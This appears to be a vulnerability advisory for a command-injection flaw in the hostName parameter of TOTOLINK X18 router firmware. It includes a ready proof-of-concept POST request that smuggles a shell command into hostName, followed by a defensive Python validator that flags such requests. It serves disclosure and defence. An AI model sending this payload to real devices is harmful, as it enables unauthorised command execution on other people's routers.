TOTOLINK: X18 V9.1.0cu.2024_B20220329
TOTOLINK: X18 V9.1.0cu.2021_B20220326
https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/226/ids/36.html
The hostName parameter of setOpModeCfg in cstecgi.cgi is attacker-controllable and is not validated before use. The vulnerable code path is reached only after passing the proto check: proto must not be 0, 4, 6 or 8 (the PoC uses proto = 7), which then triggers the injection shown below.
CsteSystem is exported by /usr/lib/libcscommon.so. Analysis of that library shows that the command string is ultimately executed by invoking /bin/bash through execv, so shell metacharacters in hostName are interpreted by the shell.
PoC:
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.109.161
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 61
Origin: http://192.168.109.161
Connection: close
Referer: http://192.168.109.161/basic/mesh.html?timestamp=1667781517612
Cookie: SESSION_ID=2:1667781512:2
{"hostName": "1'|id\n","proto":"7","topicurl":"setOpModeCfg"}
Test screenshot:
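As an added defender-side example (not from the report and not TOTOLINK's firmware code), the check below shows what input validation for hostName should look like: a strict RFC 1123 allowlist that is applied regardless of the proto value, plus an audit helper that flags a setOpModeCfg request body whose hostName fails that check. The function names and the second sample body are my own assumptions.

```python
import json
import re

# RFC 1123 hostname label: letters, digits and hyphens, no leading or
# trailing hyphen, at most 63 characters per label.
_LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_hostname(value) -> bool:
    """Allowlist check. Anything outside RFC 1123 syntax is rejected, which
    implicitly covers every shell metacharacter (|, ;, `, $, quotes, newlines)."""
    if not isinstance(value, str) or not 1 <= len(value) <= 253:
        return False
    return all(_LABEL_RE.match(label) for label in value.split("."))


def audit_setopmodecfg(body: str) -> dict:
    """Inspect one cstecgi.cgi POST body (JSON). 'suspicious' is True when the
    topic is setOpModeCfg and hostName is not a well-formed hostname. The proto
    field is deliberately ignored: the bypass in the report shows that gating on
    proto alone protects nothing."""
    try:
        data = json.loads(body)
    except ValueError:
        return {"suspicious": True, "reason": "body is not valid JSON"}
    if data.get("topicurl") != "setOpModeCfg":
        return {"suspicious": False, "reason": "other topic"}
    host = data.get("hostName", "")
    if is_valid_hostname(host):
        return {"suspicious": False, "reason": "hostName is a well-formed hostname"}
    bad = sorted({ch for ch in str(host) if not (ch.isalnum() or ch in "-.")})
    return {"suspicious": True, "reason": "disallowed characters in hostName: %r" % bad}


# Constructed samples: the first is the request body from the PoC above,
# the second is a legitimate configuration request (hypothetical hostname).
SAMPLE_BODIES = [
    '{"hostName": "1\'|id\\n","proto":"7","topicurl":"setOpModeCfg"}',
    '{"hostName": "mesh-node-01","proto":"7","topicurl":"setOpModeCfg"}',
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(audit_setopmodecfg(body))
```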